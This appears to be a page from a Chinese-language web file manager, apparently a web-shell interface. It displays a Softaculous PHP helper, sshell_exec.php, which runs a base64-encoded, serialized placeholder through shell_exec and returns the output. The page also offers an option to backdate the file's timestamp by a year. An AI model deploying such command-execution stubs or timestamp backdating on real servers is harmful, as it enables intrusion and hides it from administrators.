文件操作 - sshell_exec.php
返回文件管理
返回主菜单
删除本文件
文件: /usr/local/softaculous/lib/aefer/sshell_exec.php
编辑文件内容
<?php error_reporting(E_ALL); function softdie($txt){ $array = array(); $array['output'] = shell_exec(unserialize(base64_decode('[[[execute]]]'))); $array['result'] = $txt; echo '<aefer>'.base64_encode(serialize($array)).'</aefer>';die(); } softdie('DONE');
修改文件时间
将文件时间修改为当前时间的前一年
删除文件